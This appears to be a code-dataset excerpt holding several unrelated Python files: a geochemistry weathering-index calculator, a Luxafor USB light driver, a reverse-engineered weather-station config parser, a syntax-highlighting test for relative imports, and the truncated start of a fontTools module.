| text (string, 6-947k chars) | repo_name (string, 5-100 chars) | path (string, 4-231 chars) | language (string, 1 class) | license (string, 15 classes) | size (int64, 6-947k) | score (float64, 0-0.34) |
|---|---|---|---|---|---|---|
from ImportDependence import *
from CustomClass import *
class CIA(AppForm):
useddf=pd.DataFrame()
Lines = []
Tags = []
description = 'Chemical Index of Alteration'
unuseful = ['Name',
'Mineral',
'Author',
'DataType',
'Label',
'Marker',
'Color',
'Size',
'Alpha',
'Style',
'Width',
'Tag']
reference = '''
CIA = [Al2O3/(Al2O3+CaO*+Na2O+K2O)]×100
ICV = (Fe2O3+K2O+Na2O+CaO*+MgO+MnO+TiO2)/Al2O3 (Cox,1995)
PIA = {(Al2O3-K2O)/[(Al2O3-K2O)+CaO*+Na2O]}×100
CIW = [Al2O3/(Al2O3+CaO*+Na2O)]×100
CIW' = [Al2O3/(Al2O3+Na2O)]×100
where CaO* is the amount of CaO incorporated in the silicate fraction of the rock.
CaO* = CaO - (10/3 * P2O5)
if CaO* < Na2O:
CaO* = CaO*
else:
CaO* = Na2O
References:
Nesbitt-CIA-1982
Harnois-CIW-1988
Mclennan-CIA-1993
Cox R-ICV-1995
Fedo-PIA-1995
Cullers-CIW'-2000
Song B W-2013
Cox R, Lowe D R, Cullers R L. The influence of sediment recycling and basement composition on evolution of mudrock chemistry in the southwestern United States[J]. Geochimica Et Cosmochimica Acta, 1995, 59(14):2919-2940.
Harnois, L., 1988, The CIW index: A new chemical index of weathering: Sedimentary Geology, v. 55, p. 319–322. doi:10.1016/0037-0738(88)90137-6
Nesbitt, H.W., and Young, G.M., 1982, Early Proterozoic climates and plate motions inferred from major element chemistry of lutites: Nature, v. 299, p. 715–717. doi:10.1038/299715a0
'''
BaseMass = {'SiO2': 60.083,
'TiO2': 79.865,
'Al2O3': 101.960077,
'TFe2O3': 159.687,
'Fe2O3': 159.687,
'TFeO': 71.844,
'FeO': 71.844,
'MnO': 70.937044,
'MgO': 40.304,
'CaO': 56.077000000000005,
'Na2O': 61.978538560000004,
'K2O': 94.1956,
'P2O5': 141.942523996,
'CO2': 44.009,
'SO3': 80.057,
'FeO': 71.844,
'Fe3O4': 231.531,
'BaO': 153.326,
'SrO': 103.619,
'Cr2O3': 151.98919999999998,
}
def __init__(self, parent=None, df=pd.DataFrame()):
QMainWindow.__init__(self, parent)
self.setWindowTitle('Chemical Index of Alteration & Index of Compositional Variability')
self.items = []
self._df = df
self._df.reindex()
if (len(df) > 0):
self._changed = True
# print('DataFrame received to CIA')
self.raw = df
self.raw = self.CleanDataFile(df)
self.rawitems = self.raw.columns.values.tolist()
for i in self.rawitems:
if i not in self.unuseful:
self.items.append(i)
else:
pass
self.create_main_frame()
self.create_status_bar()
def create_main_frame(self):
self.resize(800,600)
self.main_frame = QWidget()
self.dpi = 128
self.setWindowTitle('Chemical Index of Alteration & Index of Compositional Variability')
self.tableView = CustomQTableView(self.main_frame)
self.tableView.setObjectName('tableView')
self.tableView.setSortingEnabled(True)
self.textbox = GrowingTextEdit(self)
self.textbox.setText(self.reference)
# Other GUI controls
self.save_button = QPushButton('&Save')
self.save_button.clicked.connect(self.saveDataFile)
#
# Layout with box sizers
#
self.hbox = QHBoxLayout()
for w in [self.save_button]:
self.hbox.addWidget(w)
self.hbox.setAlignment(w, Qt.AlignVCenter)
self.vbox = QVBoxLayout()
self.vbox.addWidget(self.tableView)
#self.vbox.addWidget(self.tableView)
self.vbox.addLayout(self.hbox)
self.vbox.addWidget(self.textbox)
self.main_frame.setLayout(self.vbox)
self.setCentralWidget(self.main_frame)
def Read(self, inpoints):
points = []
for i in inpoints:
points.append(i.split())
result = []
for i in points:
for l in range(len(i)):
a = float((i[l].split(','))[0])
a = a * self.x_scale
b = float((i[l].split(','))[1])
b = (self.height_load - b) * self.y_scale
result.append((a, b))
return (result)
def CIA(self):
self.WholeData = []
dataframe=pd.DataFrame()
dataframe = self._df
#dataframe.set_index('Label')
ItemsAvalibale = dataframe.columns.values.tolist()
Indexes = dataframe.index.values.tolist()
#ItemsToCheck = ['Label','SiO2','Al2O3','Fe2O3','MgO','CaO','Na2O','K2O','P2O5','MnO','TiO2']
ItemsToTest = ['Number', 'Tag', 'Name', 'Author', 'DataType', 'Marker', 'Color', 'Size', 'Alpha',
'Style', 'Width']
for i in ItemsAvalibale:
if 'O' not in i and i !='Label':
dataframe = dataframe.drop(i, 1)
WholeItemsAvalibale = dataframe.columns.values.tolist()
ItemsAvalibale = dataframe.columns.values.tolist()
Indexes = dataframe.index.values.tolist()
if 'Whole' not in WholeItemsAvalibale:
WholeItemsAvalibale.append('Whole')
if 'CIA' not in WholeItemsAvalibale:
WholeItemsAvalibale.append('CIA')
if 'ICV' not in WholeItemsAvalibale:
WholeItemsAvalibale.append('ICV')
if 'PIA' not in WholeItemsAvalibale:
WholeItemsAvalibale.append('PIA')
if 'CIW' not in WholeItemsAvalibale:
WholeItemsAvalibale.append('CIW')
if 'CIW\'' not in WholeItemsAvalibale:
WholeItemsAvalibale.append('CIW\'')
print('index',Indexes,'\ncolums',WholeItemsAvalibale)
WholeMole=[]
WholeList=[]
dataframe = dataframe.dropna(axis=1,how='all')
print(dataframe)
for j in Indexes:
tmpList=[]
tmpMoleSum=0
tmpcia=0
tmpAl2O3=0
tmpCaO=0
tmpNa2O=0
tmpK2O=0
tmpP2O5=0
tmpFe2O3=0
tmpMgO=0
tmpMnO=0
tmpTiO2=0
#ICV =(Fe2O3+K2O+Na2O+CaO*+MgO+MnO+TiO2)/Al2O3 (Cox,1995)
for i in ItemsAvalibale:
if i in self.BaseMass:
m=dataframe.at[j,i]
n=self.BaseMass[i]
#print('\nm & n is \t',m,n)
tmpmole= m/n
#print(tmpmole)
tmpMoleSum = tmpMoleSum + tmpmole
#tmpList.append(dataframe.at[i,j])
#print('\n total mole is',tmpMoleSum)
for i in ItemsAvalibale:
if i in self.BaseMass:
tmpdata= 100*(dataframe.at[j,i]/self.BaseMass[i])/tmpMoleSum
tmpList.append(tmpdata)
#print(i, tmpdata)
if i =='Al2O3':
tmpAl2O3=tmpdata
elif i =='CaO':
tmpCaO=tmpdata
elif i =='Na2O':
tmpNa2O = tmpdata
elif i =='K2O':
tmpK2O=tmpdata
elif i =='P2O5':
tmpP2O5=tmpdata
elif i =='Fe2O3':
tmpFe2O3=tmpdata
elif i == 'MgO':
tmpMgO = tmpdata
elif i == 'MnO':
tmpMnO = tmpdata
elif i == 'TiO2':
tmpTiO2 = tmpdata
elif i == 'Label' :
tmpdata = dataframe.at[j,i]
tmpList.append(tmpdata)
elif i in WholeItemsAvalibale:
del WholeItemsAvalibale[WholeItemsAvalibale.index(i)]
tmpList.append(tmpMoleSum)
usedCaO=0
middleCaO= tmpCaO-(10/3.0*tmpP2O5)
if middleCaO< tmpNa2O:
usedCaO=middleCaO
else:
usedCaO=tmpNa2O
#print(tmpAl2O3, usedCaO, tmpK2O, tmpNa2O)
CIA=tmpAl2O3/(tmpAl2O3+usedCaO+tmpNa2O+tmpK2O)*100
tmpList.append(CIA)
ICV =(tmpFe2O3+tmpK2O+tmpNa2O+usedCaO+tmpMgO+tmpMnO+tmpTiO2)/tmpAl2O3 #(Cox,1995)
tmpList.append(ICV)
PIA = ((tmpAl2O3-tmpK2O)/(tmpAl2O3-tmpK2O+usedCaO+tmpNa2O))*100
tmpList.append(PIA)
CIW = (tmpAl2O3/(tmpAl2O3+usedCaO+tmpNa2O))*100
tmpList.append(CIW)
CIW2 = (tmpAl2O3/(tmpAl2O3+tmpNa2O))*100
tmpList.append(CIW2)
'''
CIA = [Al2O3/(Al2O3+CaO*+Na2O+K2O)]×100
ICV = (Fe2O3+K2O+Na2O+CaO*+MgO+MnO+TiO2)/Al2O3 (Cox,1995)
PIA = {(Al2O3-K2O)/[(Al2O3-K2O)+CaO*+Na2O]}×100
CIW = [Al2O3/(Al2O3+CaO*+Na2O)]×100
CIW' = [Al2O3/(Al2O3+Na2O)]×100
'''
#print(len(tmpList))
WholeList.append(tmpList)
pass
print(len(WholeList))
print(len(WholeItemsAvalibale))
df = pd.DataFrame(WholeList,columns=WholeItemsAvalibale)
self.useddf = df
self.tableView.setModel(PandasModel(self.useddf))
self.show()
def saveDataFile(self):
# if self.model._changed == True:
# print('changed')
# print(self.model._df)
DataFileOutput, ok2 = QFileDialog.getSaveFileName(self,
'Save File',
'C:/',
'Excel Files (*.xlsx);;CSV Files (*.csv)') # save the output data file
if (DataFileOutput != ''):
if ('csv' in DataFileOutput):
self.useddf.to_csv(DataFileOutput, sep=',', encoding='utf-8')
elif ('xls' in DataFileOutput):
self.useddf.to_excel(DataFileOutput, encoding='utf-8')
| chinageology/GeoPython | geopytool/CIA.py | Python | gpl-3.0 | 10,636 | 0.010566 |
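# Minimal standalone sketch of the weathering-index arithmetic that the CIA class
# above performs row by row: convert wt% oxides to molar proportions, apply the
# CaO* correction (CaO - 10/3 * P2O5, capped at Na2O), then evaluate CIA, ICV,
# PIA, CIW and CIW'. The sample composition is hypothetical; molar masses are
# taken from the BaseMass table in CIA.py.
MOLAR_MASS = {'SiO2': 60.083, 'TiO2': 79.865, 'Al2O3': 101.960077,
              'Fe2O3': 159.687, 'MnO': 70.937044, 'MgO': 40.304,
              'CaO': 56.077, 'Na2O': 61.97853856, 'K2O': 94.1956,
              'P2O5': 141.942523996}

def weathering_indices(wt_percent):
    # molar proportions, normalised to 100, as in CIA.CIA()
    moles = {ox: wt_percent[ox] / MOLAR_MASS[ox]
             for ox in wt_percent if ox in MOLAR_MASS}
    total = sum(moles.values())
    m = {ox: 100.0 * v / total for ox, v in moles.items()}
    # CaO* = CaO - 10/3 * P2O5, capped at Na2O (silicate-bound CaO only)
    cao_star = min(m['CaO'] - (10.0 / 3.0) * m['P2O5'], m['Na2O'])
    cia = m['Al2O3'] / (m['Al2O3'] + cao_star + m['Na2O'] + m['K2O']) * 100
    icv = (m['Fe2O3'] + m['K2O'] + m['Na2O'] + cao_star
           + m['MgO'] + m['MnO'] + m['TiO2']) / m['Al2O3']
    pia = (m['Al2O3'] - m['K2O']) / (m['Al2O3'] - m['K2O'] + cao_star + m['Na2O']) * 100
    ciw = m['Al2O3'] / (m['Al2O3'] + cao_star + m['Na2O']) * 100
    ciw_prime = m['Al2O3'] / (m['Al2O3'] + m['Na2O']) * 100
    return {'CIA': cia, 'ICV': icv, 'PIA': pia, 'CIW': ciw, "CIW'": ciw_prime}

# hypothetical shale-like composition, wt%
print(weathering_indices({'SiO2': 62.8, 'TiO2': 1.0, 'Al2O3': 18.9, 'Fe2O3': 6.5,
                          'MnO': 0.1, 'MgO': 2.2, 'CaO': 1.3, 'Na2O': 1.2,
                          'K2O': 3.7, 'P2O5': 0.16}))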
# -*- coding: utf-8 -*-
import usb
class LuxaforFlag(object):
DEVICE_VENDOR_ID = 0x04d8
DEVICE_PRODUCT_ID = 0xf372
MODE_STATIC_COLOUR = 1
MODE_FADE_COLOUR = 2
MODE_STROBE = 3
MODE_WAVE = 4
MODE_PATTERN = 6
LED_TAB_1 = 1
LED_TAB_2 = 2
LED_TAB_3 = 3
LED_BACK_1 = 4
LED_BACK_2 = 5
LED_BACK_3 = 6
LED_TAB_SIDE = 65
LED_BACK_SIDE = 66
LED_ALL = 255
WAVE_SINGLE_SMALL = 1
WAVE_SINGLE_LARGE = 2
WAVE_DOUBLE_SMALL = 3
WAVE_DOUBLE_LARGE = 4
PATTERN_LUXAFOR = 1
PATTERN_RANDOM1 = 2
PATTERN_RANDOM2 = 3
PATTERN_RANDOM3 = 4
PATTERN_POLICE = 5
PATTERN_RANDOM4 = 6
PATTERN_RANDOM5 = 7
PATTERN_RAINBOWWAVE = 8
def __init__(self):
self.device = None
def get_device(self):
"""
Retrieve a PyUSB device for the Luxafor Flag.
Will lazy load the device as necessary.
"""
if not self.device:
self.device = self.find_device()
self.setup_device(self.device)
return self.device
def setup_device(self, device):
"""
Performs initialisation on the device.
"""
try:
# Gets around "Resource busy" errors
device.detach_kernel_driver(0)
except Exception as e:
pass
device.set_configuration()
def find_device(self):
"""
Attempts to retrieve the Luxafor Flag device using the known Vendor
and Product IDs.
"""
device = usb.core.find(
idVendor=LuxaforFlag.DEVICE_VENDOR_ID,
idProduct=LuxaforFlag.DEVICE_PRODUCT_ID
)
return device
def write(self, values):
"""
Send values to the device.
Expects the values to be a List of command byte codes. Refer to
the individual commands for more information on the specific command
codes.
"""
self.get_device().write(1, values)
# Sometimes the flag simply ignores the command. Unknown if this
# is an issue with PyUSB or the flag itself. But sending the
# command again works a treat.
self.get_device().write(1, values)
def create_static_colour_command(self, led, r, g, b):
return [LuxaforFlag.MODE_STATIC_COLOUR, led, r, g, b]
def create_fade_colour_command(self, led, r, g, b, duration=20):
return [LuxaforFlag.MODE_FADE_COLOUR, led, r, g, b, duration]
def create_strobe_command(self, led, r, g, b, duration=20, repeat=2):
return [LuxaforFlag.MODE_STROBE, led, r, g, b, duration, 0, repeat]
def create_wave_command(self, wave_type, r, g, b, duration=20, repeat=1):
return [
LuxaforFlag.MODE_WAVE, wave_type, r, g, b, duration, 0, repeat
]
def create_pattern_command(self, pattern_id, repeat=1):
return [LuxaforFlag.MODE_PATTERN, pattern_id, repeat]
def off(self):
"""
Turn off all LEDs.
"""
self.do_static_colour(255, 0, 0, 0)
def do_static_colour(self, leds, r, g, b):
"""
Set a single LED or multiple LEDs immediately to the specified colour.
"""
self._do_multi_led_command(
self.create_static_colour_command, leds, r, g, b
)
def do_fade_colour(self, leds, r, g, b, duration):
"""
Fade a single LED or multiple LEDs from their current colour to a new
colour for the supplied duration.
"""
self._do_multi_led_command(
self.create_fade_colour_command, leds, r, g, b, duration
)
def do_strobe(self, led, r, g, b, duration, repeat):
"""
Flash the specified LED a specific colour, giving the duration of each
flash and the number of times to repeat.
Unfortunately this command does not support multiple specific LEDs.
"""
command = self.create_strobe_command(led, r, g, b, duration, repeat)
self.write(command)
def do_wave(self, wave_type, r, g, b, duration, repeat):
"""
Animate the flag with a wave pattern of the given type, using the
specified colour, duration and number of times to repeat.
"""
command = self.create_wave_command(
wave_type, r, g, b, duration, repeat
)
self.write(command)
def do_pattern(self, pattern, repeat):
"""
Execute a built in pattern a given number of times.
"""
command = self.create_pattern_command(pattern, repeat)
self.write(command)
def _do_multi_led_command(
self, create_command_function, leds, *args, **kwargs
):
try:
iter(leds)
except TypeError:
command = create_command_function(leds, *args, **kwargs)
self.write(command)
else:
for led in leds:
command = create_command_function(led, *args, **kwargs)
self.write(command)
| takeontom/pyluxafor | pyluxafor/pyluxafor.py | Python | mit | 4,987 | 0 |
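# Hedged usage sketch for the LuxaforFlag class above: it assumes pyusb is
# installed, a Luxafor Flag is plugged in, and that the class is importable from
# pyluxafor.pyluxafor (the repo stores it in pyluxafor/pyluxafor.py). Colour and
# timing values are arbitrary; only methods defined in the file are called.
from pyluxafor.pyluxafor import LuxaforFlag

flag = LuxaforFlag()
flag.off()                                                 # all LEDs off
flag.do_static_colour(LuxaforFlag.LED_ALL, 0, 255, 0)      # solid green
flag.do_fade_colour([LuxaforFlag.LED_TAB_1, LuxaforFlag.LED_BACK_1],
                    255, 0, 0, duration=30)                # fade two LEDs to red
flag.do_pattern(LuxaforFlag.PATTERN_POLICE, repeat=2)      # built-in pattern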
#!/usr/bin/python
## This driver is based on reverse engineering of HeavyWeather 2800 v 1.54
## All copyright goes to La Crosse Technology (c) 2008
## Python port by Eddi De Pieri <eddi@depieri.net>
## Use this software at your own risk.
## Neither I nor La Crosse Technology is responsible for any damage caused by using this software
from configobj import ConfigObj
import logging
import USBHardware
USBHardware = USBHardware.USBHardware()
class CWeatherStationConfig(object):
def __init__(self):
self.logger = logging.getLogger('ws28xx.CWeatherStationConfig')
filename= "/etc/WV5Datastore.cfg"
config = ConfigObj(filename)
config.filename = filename
try:
self._CheckSumm = int(config['ws28xx']['CheckSumm'])
except:
self._CheckSumm = 0
self._ClockMode = 0
self._TemperatureFormat = 0
self._PressureFormat = 0
self._RainFormat = 0
self._WindspeedFormat = 0
self._WeatherThreshold = 0
self._StormThreshold = 0
self._LCDContrast = 0
self._LowBatFlags = 0
self._ResetMinMaxFlags = 0
self._HistoryInterval = 0
def readAlertFlags(self,buf):
print "CWeatherStationConfig::readAlertFlags"
def GetResetMinMaxFlags(self):
print "CWeatherStationConfig::GetResetMinMaxFlags"
def CWeatherStationConfig_buf(self,buf,start):
newbuf=[0]
newbuf[0] = buf[0]
#CWeatherStationHighLowAlarm::CWeatherStationHighLowAlarm(&this->_AlarmTempIndoor);
#v4 = 0;
#CWeatherStationHighLowAlarm::CWeatherStationHighLowAlarm(&thisa->_AlarmTempOutdoor);
#LOBYTE(v4) = 1;
#CWeatherStationHighLowAlarm::CWeatherStationHighLowAlarm(&thisa->_AlarmHumidityOutdoor);
#LOBYTE(v4) = 2;
#CWeatherStationHighLowAlarm::CWeatherStationHighLowAlarm(&thisa->_AlarmHumidityIndoor);
#LOBYTE(v4) = 3;
#CWeatherStationWindAlarm::CWeatherStationWindAlarm(&thisa->_AlarmGust);
#LOBYTE(v4) = 4;
#CWeatherStationHighLowAlarm::CWeatherStationHighLowAlarm(&thisa->_AlarmPressure);
#LOBYTE(v4) = 5;
#CWeatherStationHighAlarm::CWeatherStationHighAlarm(&thisa->_AlarmRain24H);
#LOBYTE(v4) = 6;
#CWeatherStationWindDirectionAlarm::CWeatherStationWindDirectionAlarm(&thisa->_AlarmWindDirection);
#LOBYTE(v4) = 7;
#std::bitset<23>::bitset<23>(&thisa->_ResetMinMaxFlags);
self.read(newbuf,start);
def GetCheckSum(self):
self.logger.debug("")
self.CalcCheckSumm()
return self._CheckSumm
def CalcCheckSumm(self):
self.logger.debug("")
t = [0]
t[0] = [0]*1024
#self._ = self.write(t);
#print "CWeatherStationConfig._CheckSumm (should be retrieved) --> 0x%x" % self._CheckSumm
def read(self,buf,start):
self.logger.debug("wsconfig")
nbuf=[0]
nbuf[0]=buf[0]
#print "read",nbuf[0]
CheckSumm = nbuf[0][43+start] | (nbuf[0][42+start] << 8);
self._CheckSumm = CheckSumm;
CheckSumm -= 7;
self._ClockMode = nbuf[0][0+start] & 1;
self._TemperatureFormat = (nbuf[0][0+start] >> 1) & 1;
self._PressureFormat = (nbuf[0][0+start] >> 2) & 1;
self._RainFormat = (nbuf[0][0+start] >> 3) & 1;
self._WindspeedFormat = (nbuf[0][0+start] >> 4) & 0xF;
self._WeatherThreshold = nbuf[0][1+start] & 0xF;
self._StormThreshold = (nbuf[0][1+start] >> 4) & 0xF;
self._LCDContrast = nbuf[0][2+start] & 0xF;
self._LowBatFlags = (nbuf[0][2+start] >> 4) & 0xF;
USBHardware.ReverseByteOrder(nbuf,3+start, 4)
#buf=nbuf[0]
#CWeatherStationConfig::readAlertFlags(thisa, buf + 3+start);
USBHardware.ReverseByteOrder(nbuf, 7+start, 5);
#v2 = USBHardware.ToTemperature(nbuf, 7+start, 1);
#CWeatherStationHighLowAlarm::SetLowAlarm(&self._AlarmTempIndoor, v2);
#v3 = USBHardware.ToTemperature(nbuf + 9+start, 0);
#self._AlarmTempIndoor.baseclass_0.baseclass_0.vfptr[2].__vecDelDtor(
# (CWeatherStationAlarm *)&self._AlarmTempIndoor,
# LODWORD(v3));
#j___RTC_CheckEsp(v4);
USBHardware.ReverseByteOrder(nbuf, 12+start, 5);
#v5 = USBHardware.ToTemperature(nbuf, 12+start, 1);
#CWeatherStationHighLowAlarm::SetLowAlarm(&self._AlarmTempOutdoor, v5);
#v6 = USBHardware.ToTemperature(nbuf, 14+start, 0);
#self._AlarmTempOutdoor.baseclass_0.baseclass_0.vfptr[2].__vecDelDtor(
# (CWeatherStationAlarm *)&self._AlarmTempOutdoor,
# LODWORD(v6));
USBHardware.ReverseByteOrder(nbuf, 17+start, 2);
#v8 = USBHardware.ToHumidity(nbuf, 17+start, 1);
#CWeatherStationHighLowAlarm::SetLowAlarm(&self._AlarmHumidityIndoor, v8);
#v9 = USBHardware.ToHumidity(nbuf, 18+start, 1);
#self._AlarmHumidityIndoor.baseclass_0.baseclass_0.vfptr[2].__vecDelDtor(
# (CWeatherStationAlarm *)&self._AlarmHumidityIndoor,
# LODWORD(v9));
USBHardware.ReverseByteOrder(nbuf, 19+start, 2);
#v11 = USBHardware.ToHumidity(nbuf, 19+start, 1);
#CWeatherStationHighLowAlarm::SetLowAlarm(&self._AlarmHumidityOutdoor, v11);
#v12 = USBHardware.ToHumidity(nbuf, 20+start, 1);
#self._AlarmHumidityOutdoor.baseclass_0.baseclass_0.vfptr[2].__vecDelDtor(
# (CWeatherStationAlarm *)&self._AlarmHumidityOutdoor,
# LODWORD(v12));
USBHardware.ReverseByteOrder(nbuf, 21+start, 4);
#v14 = USBHardware.To4Pre3Post(nbuf, 21+start);
#self._AlarmRain24H.baseclass_0.vfptr[2].__vecDelDtor((CWeatherStationAlarm *)&self._AlarmRain24H, LODWORD(v14));
self._HistoryInterval = nbuf[0][25+start] & 0xF;
#USBHardware.ReverseByteOrder(nbuf, 26+start, 3u);
##v16 = USBHardware._ToWindspeed(nbuf, 26+start);
#CWeatherStationWindAlarm::SetHighAlarmRaw(&self._AlarmGust, v16);
#USBHardware.ReverseByteOrder(nbuf, 29+start, 5u);
#USBHardware.ReadPressureShared(nbuf, 29+start, &a, &b);
#v17 = Conversions::ToInhg(a);
#v25 = b - v17;
#if ( fabs(v25) > 1.0 )
#{
# Conversions::ToInhg(a);
# v18 = CTracer::Instance();
# CTracer::WriteTrace(v18, 30, "low pressure alarm difference: %f");
#}
#CWeatherStationHighLowAlarm::SetLowAlarm(&self._AlarmPressure, a);
USBHardware.ReverseByteOrder(nbuf, 34+start, 5);
#USBHardware.ReadPressureShared(nbuf, 34+start, &a, &b);
#v19 = Conversions::ToInhg(a);
#v25 = b - v19;
#if ( fabs(v25) > 1.0 )
#{
# Conversions::ToInhg(a);
# v20 = CTracer::Instance();
# CTracer::WriteTrace(v20, 30, "high pressure alarm difference: %f");
#}
#self._AlarmPressure.baseclass_0.baseclass_0.vfptr[2].__vecDelDtor(
# (CWeatherStationAlarm *)&self._AlarmPressure,
# LODWORD(a));
t = nbuf[0][39+start];
t <<= 8;
t |= nbuf[0][40+start];
t <<= 8;
t |= nbuf[0][41+start];
#std::bitset<23>::bitset<23>((std::bitset<23> *)&v26, t);
#self._ResetMinMaxFlags._Array[0] = v22;
#for ( i = 0; i < 0x27; ++i )
for i in xrange(0, 38):
CheckSumm -= nbuf[0][i+start];
#if ( CheckSumm ): for now is better to comment it
#self._CheckSumm = -1;
filename= "/etc/WV5Datastore.cfg"
config = ConfigObj(filename)
config.filename = filename
config['ws28xx'] = {}
config['ws28xx']['CheckSumm'] = str(self._CheckSumm)
config['ws28xx']['ClockMode'] = str(self._ClockMode)
config['ws28xx']['TemperatureFormat'] = str(self._TemperatureFormat)
config['ws28xx']['PressureFormat'] = str(self._PressureFormat)
config['ws28xx']['RainFormat'] = str(self._RainFormat)
config['ws28xx']['WindspeedFormat'] = str(self._WindspeedFormat)
config['ws28xx']['WeatherThreshold'] = str(self._WeatherThreshold)
config['ws28xx']['StormThreshold'] = str(self._StormThreshold)
config['ws28xx']['LCDContrast'] = str(self._LCDContrast)
config['ws28xx']['LowBatFlags'] = str(self._LowBatFlags)
config['ws28xx']['HistoryInterval'] = str(self._HistoryInterval)
config.write()
return 1;
def write(self,buf):
self.logger.debug("")
new_buf = [0]
new_buf[0]=buf[0]
CheckSumm = 7;
new_buf[0][0] = 16 * (self._WindspeedFormat & 0xF) + 8 * (self._RainFormat & 1) + 4 * (self._PressureFormat & 1) + 2 * (self._TemperatureFormat & 1) + self._ClockMode & 1;
new_buf[0][1] = self._WeatherThreshold & 0xF | 16 * self._StormThreshold & 0xF0;
new_buf[0][2] = self._LCDContrast & 0xF | 16 * self._LowBatFlags & 0xF0;
#CWeatherStationConfig::writeAlertFlags(nbuf, 3);
#((void (__thiscall *)(CWeatherStationHighLowAlarm *))thisa->_AlarmTempIndoor.baseclass_0.baseclass_0.vfptr[1].__vecDelDtor)(&thisa->_AlarmTempIndoor);
#v25 = v2;
#v24 = CWeatherTraits.TemperatureOffset() + v2;
#v21 = v24;
#v22 = CWeatherTraits.TemperatureOffset() + CWeatherStationHighLowAlarm::GetLowAlarm(&thisa->_AlarmTempIndoor);
#v4 = v22;
#USBHardware::ToTempAlarmBytes(nbuf, 7, v22, v21);
#((void (__thiscall *)(CWeatherStationHighLowAlarm *))thisa->_AlarmTempOutdoor.baseclass_0.baseclass_0.vfptr[1].__vecDelDtor)(&thisa->_AlarmTempOutdoor);
#v25 = v4;
#v24 = CWeatherTraits.TemperatureOffset() + v4;
#v21 = v24;
#v22 = CWeatherTraits.TemperatureOffset() + CWeatherStationHighLowAlarm::GetLowAlarm(&thisa->_AlarmTempOutdoor);
#v6 = v22;
#USBHardware::ToTempAlarmBytes(nbuf, 12, v22, v21);
#((void (__thiscall *)(CWeatherStationHighLowAlarm *))thisa->_AlarmHumidityIndoor.baseclass_0.baseclass_0.vfptr[1].__vecDelDtor)(&thisa->_AlarmHumidityIndoor);
#v21 = v6;
#v8 = CWeatherStationHighLowAlarm::GetLowAlarm(&thisa->_AlarmHumidityIndoor);
#v9 = v8;
#USBHardware::ToHumidityAlarmBytes(nbuf, 17, v9, v21);
#((void (__thiscall *)(CWeatherStationHighLowAlarm *))thisa->_AlarmHumidityOutdoor.baseclass_0.baseclass_0.vfptr[1].__vecDelDtor)(&thisa->_AlarmHumidityOutdoor);
#v21 = v8;
#v11 = CWeatherStationHighLowAlarm::GetLowAlarm(&thisa->_AlarmHumidityOutdoor);
#v12 = v11;
#USBHardware::ToHumidityAlarmBytes(nbuf, 19, v12, v21);
#((void (__thiscall *)(CWeatherStationHighAlarm *))thisa->_AlarmRain24H.baseclass_0.vfptr[1].__vecDelDtor)(&thisa->_AlarmRain24H);
#v21 = v11;
#USBHardware::ToRainAlarmBytes(nbuf, 21, v21);
new_buf[0][25] = self._HistoryInterval & 0xF;
#v21 = CWeatherStationWindAlarm::GetHighAlarmRaw(&thisa->_AlarmGust);
#USBHardware::_ToWindspeedAlarmBytes(nbuf, 26, v21);
#v21 = CWeatherStationHighLowAlarm::GetLowAlarm(&thisa->_AlarmPressure);
#v21 = Conversions::ToInhg(v21);
#v14 = CWeatherStationHighLowAlarm::GetLowAlarm(&thisa->_AlarmPressure);
#v15 = CWeatherStationHighLowAlarm::GetLowAlarm(&thisa->_AlarmPressure);
#USBHardware::ToPressureBytesShared(nbuf, 29, v15, v21);
#((void (__thiscall *)(CWeatherStationHighLowAlarm *))thisa->_AlarmPressure.baseclass_0.baseclass_0.vfptr[1].__vecDelDtor)(&thisa->_AlarmPressure);
#((void (__thiscall *)(CWeatherStationHighLowAlarm *))thisa->_AlarmPressure.baseclass_0.baseclass_0.vfptr[1].__vecDelDtor)(&thisa->_AlarmPressure);
#USBHardware::ToPressureBytesShared(nbuf, 34, Conversions::ToInhg(CWeatherStationHighLowAlarm::GetLowAlarm(&thisa->_AlarmPressure)), Conversions::ToInhg(CWeatherStationHighLowAlarm::GetLowAlarm(&thisa->_AlarmPressure)))
#print "debugxxx ", type(self._ResetMinMaxFlags)
new_buf[0][39] = (self._ResetMinMaxFlags >> 0) & 0xFF;
new_buf[0][40] = (self._ResetMinMaxFlags >> 8) & 0xFF; #BYTE1(self._ResetMinMaxFlags);
new_buf[0][41] = (self._ResetMinMaxFlags >> 16) & 0xFF;
#for ( i = 0; i < 39; ++i )
for i in xrange(0, 38):
CheckSumm += new_buf[0][i];
new_buf[0][42] = (CheckSumm >> 8) & 0xFF #BYTE1(CheckSumm);
new_buf[0][43] = (CheckSumm >> 0) & 0xFF #CheckSumm;
buf[0] = new_buf[0]
return CheckSumm
| dpeddi/ws-28xx | CWeatherStationConfig.py | Python | gpl-3.0 | 11,102 | 0.037651 |
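# Minimal sketch of the bit layout that CWeatherStationConfig.read() above
# decodes from the first three config bytes: byte 0 packs ClockMode,
# TemperatureFormat, PressureFormat, RainFormat and WindspeedFormat; byte 1
# packs WeatherThreshold/StormThreshold; byte 2 packs LCDContrast/LowBatFlags.
# The sample byte values are hypothetical.
def unpack_config_flags(b0, b1, b2):
    return {
        'ClockMode':          b0 & 1,
        'TemperatureFormat': (b0 >> 1) & 1,
        'PressureFormat':    (b0 >> 2) & 1,
        'RainFormat':        (b0 >> 3) & 1,
        'WindspeedFormat':   (b0 >> 4) & 0xF,
        'WeatherThreshold':   b1 & 0xF,
        'StormThreshold':    (b1 >> 4) & 0xF,
        'LCDContrast':        b2 & 0xF,
        'LowBatFlags':       (b2 >> 4) & 0xF,
    }

print(unpack_config_flags(0x35, 0x23, 0x41))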
from....import a
from...import b
from..import c
from.import d
from : keyword.control.import.python, source.python
.... : punctuation.separator.period.python, source.python
import : keyword.control.import.python, source.python
: source.python
a : source.python
from : keyword.control.import.python, source.python
... : punctuation.separator.period.python, source.python
import : keyword.control.import.python, source.python
: source.python
b : source.python
from : keyword.control.import.python, source.python
.. : punctuation.separator.period.python, source.python
import : keyword.control.import.python, source.python
: source.python
c : source.python
from : keyword.control.import.python, source.python
. : punctuation.separator.period.python, source.python
import : keyword.control.import.python, source.python
: source.python
d : source.python
| MagicStack/MagicPython | test/statements/import3.py | Python | mit | 1,061 | 0.042413 |
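# Context for the test fixture above (illustrative only): the leading dots in
# "from .. import c" are relative-import levels, which is why MagicPython
# tokenizes each run of dots as punctuation.separator.period.python. In a
# hypothetical package layout
#
#   pkg/
#       __init__.py
#       sub/
#           __init__.py
#           mod.py        # the statements below live here
#
# the dots resolve upward from the current package:
#
#   from . import d       # name d from pkg.sub (current package)
#   from .. import c      # name c from pkg (one level up)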
from __future__ import print_function, division, absolute_import
from fontTools.misc.py23 import *
from fontTools.misc.textTools import safeEval, readHex
